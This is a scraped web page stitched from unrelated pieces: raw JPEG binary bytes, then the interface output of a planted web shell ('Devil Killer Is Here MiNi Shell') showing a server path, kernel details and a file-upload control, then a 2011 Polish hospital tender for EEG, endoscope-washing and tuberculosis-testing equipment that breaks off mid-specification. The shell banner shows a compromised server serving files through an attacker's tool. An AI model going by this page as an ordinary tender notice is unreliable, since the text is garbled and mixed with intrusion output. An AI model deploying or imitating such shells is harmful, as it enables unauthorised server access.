JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111116/381758-N-2011.html

<p class="kh_header"><b>Radom: Zakup i dostawa sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego ( myjnia do endoskopów, aparat EEG, automatyczny system do izolacji i określenia lekowrażliwości prątków gruźlicy)</b><br>
<b>Numer ogłoszenia: 381758 - 2011; data zamieszczenia: 16.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego ( myjnia do endoskopów, aparat EEG, automatyczny system do izolacji i określenia lekowrażliwości prątków gruźlicy).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego ( myjnia do endoskopów, aparat EEG, automatyczny system do izolacji i określenia lekowrażliwości prątków gruźlicy)
Część nr 1 - Aparat EEG dla potrzeb Poradni Neurologicznej z Pracownią EEG - 1 szt.

Lp.	Opis parametru
Stanowisko rejestracji badań z funkcją oceny zapisów EEG
analogowo-cyfrowy zespół EEG
1	głowica elektrodowa ze wzmacniaczami, przetwarzaniem analogowo-cyfrowym i izolacją galwaniczną, zasilana z aparatu
2	liczba kanałów w układzie referencyjnym min.32
3	w tym, ilość wejściowych kanałów poligraficznych min. 5
4	liczba kanałów w układzie symetrycznym min.3
5	poziom szumów (?V pp) mniejsza 2
6	rozdzielczość cyfrowa (bit) większe równe 12
7	kalibracja automatyczna
8	stała czasu [s] (0,03-10)
9	stała czasu - default 0,3 (s)
10	Czułość (10 ?V/cm - 2 mV/cm)
11	Wbudowany filtr sieciowy 50/60 Hz
12	szybkość przesuwu (rozciąg) (mm/s) (5-120)
13	częstotliwość próbkowania (Hz) większe równe 2000
14	ilość programów fotostymulacji definiowanych przez użytkownika większe równe 12
15	ilość remontaży definiowanych przez użytkownika większe równe 14
16	Funkcje systemu:
-	akwizycja i baza danych
-	eksport danych
-	przeglądanie badań i analiza
-	generacja raportów i drukowanie
-	oprogramowanie do automatycznej detekcji iglic i wykrywania napadów padaczkowych
17	Stymulator błyskowy (Hz) (1-60)
18	Zestaw komputerowy:
-	procesor min. INTEL CORE 2 DUO lub równoważny
-	pamięć RAM min. 1024 (MB)
-	dysk twardy min. 320 (GB)
-	nagrywarka DVD
-	karta sieciowa
-	klawiatura komputerowa
-	mysz
-	monitor kolorowy LCD min.19
-	system operacyjny Windows XP lub Win. 7
-	 zasilacz awaryjny UPS
-	osprzęt systemu: konsola ułatwiająca przemieszczanie systemu, zestaw okablowania, statywy
Stanowisko oceny i analizy zapisów EEG
19	Funkcje systemu:
-	przeglądanie, ocena i analiza badań EEG
-	archiwizacja danych
-	generacja raportów i drukowanie
-	oprogramowanie do automatycznej detekcji iglic i wykrywania napadów padaczkowych
20	Zestaw komputerowy:
-	procesor min. INTEL CORE 2 DUO lub równoważny
-	pamięć RAM min. 1024 (MB)
-	dysk twardy min. 320 (GB)
-	nagrywarka DVD
-	karta sieciowa
-	klawiatura komputerowa
-	mysz
-	monitor kolorowy LCD min.19
-	system operacyjny Windows XP lub Win.7
-	drukarka laserowa czarno-biała
-	osprzęt systemu: konsola ułatwiająca przemieszczanie systemu, zestaw okablowania
inne cechy aparatu
21	zaawansowane metody wizualizacji krzywej EEG dostosowujące się do bieżącej rozdzielczości monitora
22	transformacja widma sygnału z dziedziny częstotliwości do dziedziny czynności fal
23	oprogramowanie bazy danych w języku polskim
24	oprogramowanie do rejestracji, oceny i analizy zapisów EEG w języku polskim
25	instrukcja obsługi w języku polskim w wersji papierowej i elektronicznej.
26	wbudowana funkcja przenoszenia badań bez konwersji pomiędzy oferowanym aparatem EEG, a pracującym w placówce aparatem EEG typu DigiTrack
27	przeniesienie bazy danych pacjentów i ich badań z pracującego w placówce aparatu EEG DigiTrack do nowego aparatu EEG
akcesoria
28	Wymagane akcesoria:
1.	czepek do badań EEG szt.3 
w tym jeden dla dzieci.
2.	zestaw elektrod z przewodami 2 kmpl. 
w tym jeden dla dzieci (miseczkowe).
inne
29.	oferowane urządzenie jest dopuszczone do stosowania i użytkowania w Polsce zgodnie z ustawą o wyrobach medycznych z 20 maja 2010 roku
30.	Zestawy komputerowe o których mowa w pkt. 17 i 19 są oznakowane znakiem CE
31.	Dodatkowy moduł  oprogramowania do przeglądania, oceny i analizy badań EEG pod system Windows dla komputera w oddziale Neurologii.
32	okres gwarancji całego systemu 
(ilość miesięcy) min. 24
33	gwarancja produkcji części zamiennych 
(ilość lat) min.5
34	szkolenia dla wskazanego przez Użytkownika personelu medycznego:
- obsługa aparatu EEG
- przedlicencyjne warsztaty EEG pod patronatem PTNK dla lekarza neurologa (min. 1 blok warsztatowy)
35	transport krajowy i zagraniczny wraz z ubezpieczeniem, wszelkie opłaty celne, skarbowe oraz inne opłaty pośrednie po stronie dostawcy.

Część nr 2 - Myjnia do endoskopów dla potrzeb Poradni Gastroenterologicznej 
z Pracownią Endoskopową im. Dr Janusza Zawadzkiego - 1 szt.
Lp.	Opis parametru
1	Urządzenie fabrycznie nowe, rok produkcji nie wcześniej niż 2011 r.
2	Możliwość mycia i dezynfekcji 2 endoskopów jednocześnie.
3	Asynchroniczne mycie i dezynfekcja  endoskopów 
(dwie niezależne, oddzielnie sterowane komory robocze)
4	Urządzenie stacjonarne o gabarytach maksymalnych : 
wysokość  120 cm, szerokość  91 cm, głębokość  66 cm.
5	Dezynfekcja chemiczna
6	Urządzenie wyposażone w podgrzewacz dezyfektanta i sensor temperaturowy każdej z komór.
7.	Proces dezynfekcyjny z ograniczonym do minimum ryzykiem szkodliwego wpływu na zdrowie personelu i środowiska.
8.	Skład płynów dezynfekcyjnych przyjazny w dezynfekcji endoskopów giętkich f-my Olympus, którymi dysponuje placówka.
9.	Temperatura dezynfekcji min. 20°C
10.	Praca myjni w obiegu zamkniętym (mycie, dezynfekcja, płukanie, suszenie)
11	Mycie i dezynfekcja endoskopów elastycznych różnych producentów w tym f-my Olympus którymi dysponuje placówka.
12	Automatyczna kontrola szczelności endoskopu przez cały proces
13	System kontroli przepływu płynów przez kanały endoskopu.
14	Jednakowe warunki mycia powierzchni wewnętrznych 
i zewnętrznych endoskopu
15	Samodezynfekcja myjni
16	Opcja płukania kanałów alkoholem 
17	Sterowanie mikroprocesorowe
18	Minimum 7 programów mycia i dezynfekcji
19	Minimum dwuliniowy wyświetlacz komunikatów tekstowych
20	Wyświetlanie komunikatów w języku polskim
21	Wybór programów dostosowany do rodzaju i stopnia zanieczyszczenia endoskopów
22	Możliwość modyfikacji programów
23	Wbudowana drukarka parametrów procesu z możliwością wydruku raportu z przebiegu każdego cyklu dezynfekcji
24	Myjnia wyposażona w kompaktowy zmiękczacz wody zapewniający prawidłowe parametry wody dla pracy myjni.
25	Zasilanie elektryczne myjni 230V; 50Hz
INNE
26	Oferowane urządzenie jest dopuszczone do stosowania i użytkowania w Polsce zgodnie z ustawą o wyrobach medycznych z 20 maja 2010 roku
27	Okres gwarancji na urządzenie min. 24 miesiące. W okresie gwarancji Zamawiający nie ponosi żadnych kosztów związanych z obsługą serwisową urządzenia.
28	Instruktaż personelu Zamawiającego w zakresie obsługi urządzenia przeprowadzony w dwóch uzgodnionych terminach.
29	Autoryzowany serwis gwarancyjny i pogwarancyjny na terenie Polski
30	Czas reakcji serwisu na zgłoszenie awarii w okresie gwarancji do 48 godzin.

31	Deklaracja zgodności  z normą PN_EN ISO 15883-4 
32	Urządzenie oznakowane znakiem CE   
33	Instrukcja obsługi urządzenia w języku polskim w wersji papierowej i elektronicznej

Część nr 3 - Automatyczny system do izolacji i określenia lekowrażliwości prątków gruźlicy dla potrzeb Laboratorium Mikrobiologicznego - 1 szt.

Lp.	Opis parametru
1	Pełna automatyzacja procesu kontroli wzrostu TB
2	Ilość miejsc pomiarowych nie więcej niż 320
3.	Analiza procesu wzrostu TB oparta na metodzie fluorescencji
4.	Oznaczenie lekowrażliwości na streptomycynę, izoniazyd, rifampicynę, etambutol i pyrazynamid
5.	W analizie lekorważliwości możliwość łączenia w pakiety probówek z analizowanymi preparatami (lakami) dla poszczególnych pacjentów
6.	Komunikacja z użytkownikiem realizowana za pomocą ciekłokrystalicznego ekranu
7.	Możliwość zapamiętania wyników analiz
8.	Wizualne i dźwiękowe alarmy przekroczenia ustalonych/ prawidłowych parametrów procesu
9.	Zintegrowany czytnik kodów paskowych, oprogramowanie umożliwiające identyfikację próbek na podstawie kodu
10.	Aparat wyposażony w drukarkę umożliwiającą wydruk raportu badania
11.	Zapewnienie serwisu i przeglądów technicznych aparatu w okresie gwarancji z zgodnie z zaleceniami producenta.
12.	Instrukcja obsługi w języku polskim
13.	Deklaracja CE

Zamawiający wymaga  dostawy odczynników niezbędnych do uruchomienia w/w systemu . Odczynniki te muszą być kompatybilne z określonym systemem przez Zamawiającego.
Lp.	Produkt	Ilość
1	Probówki z podłożem płynnym do hodowli, wykonane z tworzywa, zakręcane ( probówki do hodowli i oznaczania lekorważliwości )	100 szt.
2	Zestaw z suplementem antybiotykowym i wzrostowym PANTA OADC	100 oznaczeń
3	Zestaw do oznaczania wrażliwości na: streptomycynę, izoniazyd, rifampicynę, etambutol SIRE	50 oznaczeń
4.	Zetaw do oznaczenia wrażliwości na pirazynamid PZA	50 oznaczeń
5.	Probówki z podłożem do oznaczania wrażliwości na pirazynamid	25 oznaczeń
6.	Test niacynowy do identyfikacji prątka	25 paski(szt.)
7.	Kontrola testu niacynowego	50 krążków (szt.)
8.	Test do identyfikacji mycobacterium z hodowli na podłożu płynnym	25 testów (szt.)
9.	Zestaw do opracowania probówki materiału w kierunku prątka 	10 ml
10.	Probówki do pobierania i obróbki materiału w kierunku prątka , poj. 50 ml, stożkowe dno (Falcon)	500 probówek

Zamawiający przyjmie każdy sprzęt, który spełnia podstawowe parametry określone w SIWZ.  Inne  parametry  sprzętu  (które  są  korzystniejsze,  lepsze  od  parametrów  wymaganych granicznych) nie dyskryminują oferty i nie mają wpływu na jej ocenę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.12.11.00-5, 33.19.10.00-5, 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał min. 2 dostawy oferowanego towaru
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2.	Wypełniony formularz oferty.
3.	Wypełniony formularz cenowy/specyfikacja techniczna</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
ul. Lekarska 4 
26-610 Radom
piętro III pokój 313.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2011 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
ul. Lekarska 4 
26-610 Radom
piętro III pokój 308 lub 313.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Aparat EEG dla potrzeb Poradni Neurologicznej z Pracownią EEG - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat EEG dla potrzeb Poradni Neurologicznej z Pracownią EEG - 1 szt.
Lp.	Opis parametru
Stanowisko rejestracji badań z funkcją oceny zapisów EEG
analogowo-cyfrowy zespół EEG
1	głowica elektrodowa ze wzmacniaczami, przetwarzaniem analogowo-cyfrowym i izolacją galwaniczną, zasilana z aparatu
2	liczba kanałów w układzie referencyjnym min.32
3	w tym, ilość wejściowych kanałów poligraficznych min. 5
4	liczba kanałów w układzie symetrycznym min.3
5	poziom szumów (?V pp) mnieniszy 2
6	rozdzielczość cyfrowa (bit) wiekszy równy 12
7	kalibracja automatyczna
8	stała czasu [s] (0,03-10)
9	stała czasu - default 0,3 (s)
10	Czułość (10 ?V/cm - 2 mV/cm)
11	Wbudowany filtr sieciowy 50/60 Hz
12	szybkość przesuwu (rozciąg) (mm/s) (5-120)
13	częstotliwość próbkowania (Hz) większy równy 2000
14	ilość programów fotostymulacji definiowanych przez użytkownika większy równy 12
15	ilość remontaży definiowanych przez użytkownika większy równy 14
16	Funkcje systemu:
-	akwizycja i baza danych
-	eksport danych
-	przeglądanie badań i analiza
-	generacja raportów i drukowanie
-	oprogramowanie do automatycznej detekcji iglic i wykrywania napadów padaczkowych
17	Stymulator błyskowy (Hz) (1-60)
18	Zestaw komputerowy:
-	procesor min. INTEL CORE 2 DUO lub równoważny
-	pamięć RAM min. 1024 (MB)
-	dysk twardy min. 320 (GB)
-	nagrywarka DVD
-	karta sieciowa
-	klawiatura komputerowa
-	mysz
-	monitor kolorowy LCD min.19
-	system operacyjny Windows XP lub Win. 7
-	 zasilacz awaryjny UPS
-	osprzęt systemu: konsola ułatwiająca przemieszczanie systemu, zestaw okablowania, statywy
Stanowisko oceny i analizy zapisów EEG
19	Funkcje systemu:
-	przeglądanie, ocena i analiza badań EEG
-	archiwizacja danych
-	generacja raportów i drukowanie
-	oprogramowanie do automatycznej detekcji iglic i wykrywania napadów padaczkowych
20	Zestaw komputerowy:
-	procesor min. INTEL CORE 2 DUO lub równoważny
-	pamięć RAM min. 1024 (MB)
-	dysk twardy min. 320 (GB)
-	nagrywarka DVD
-	karta sieciowa
-	klawiatura komputerowa
-	mysz
-	monitor kolorowy LCD min.19
-	system operacyjny Windows XP lub Win.7
-	drukarka laserowa czarno-biała
-	osprzęt systemu: konsola ułatwiająca przemieszczanie systemu, zestaw okablowania
inne cechy aparatu
21	zaawansowane metody wizualizacji krzywej EEG dostosowujące się do bieżącej rozdzielczości monitora
22	transformacja widma sygnału z dziedziny częstotliwości do dziedziny czynności fal
23	oprogramowanie bazy danych w języku polskim
24	oprogramowanie do rejestracji, oceny i analizy zapisów EEG w języku polskim
25	instrukcja obsługi w języku polskim w wersji papierowej i elektronicznej.
26	wbudowana funkcja przenoszenia badań bez konwersji pomiędzy oferowanym aparatem EEG, a pracującym w placówce aparatem EEG typu DigiTrack
27	przeniesienie bazy danych pacjentów i ich badań z pracującego w placówce aparatu EEG DigiTrack do nowego aparatu EEG
akcesoria
28	Wymagane akcesoria:
1.	czepek do badań EEG szt.3 
w tym jeden dla dzieci.
2.	zestaw elektrod z przewodami 2 kmpl. 
w tym jeden dla dzieci (miseczkowe).
inne
29.	oferowane urządzenie jest dopuszczone do stosowania i użytkowania w Polsce zgodnie z ustawą o wyrobach medycznych z 20 maja 2010 roku
30.	Zestawy komputerowe o których mowa w pkt. 17 i 19 są oznakowane znakiem CE
31.	Dodatkowy moduł  oprogramowania do przeglądania, oceny i analizy badań EEG pod system Windows dla komputera w oddziale Neurologii.
32	okres gwarancji całego systemu 
(ilość miesięcy) min. 24
33	gwarancja produkcji części zamiennych 
(ilość lat) min.5
34	szkolenia dla wskazanego przez Użytkownika personelu medycznego:
- obsługa aparatu EEG
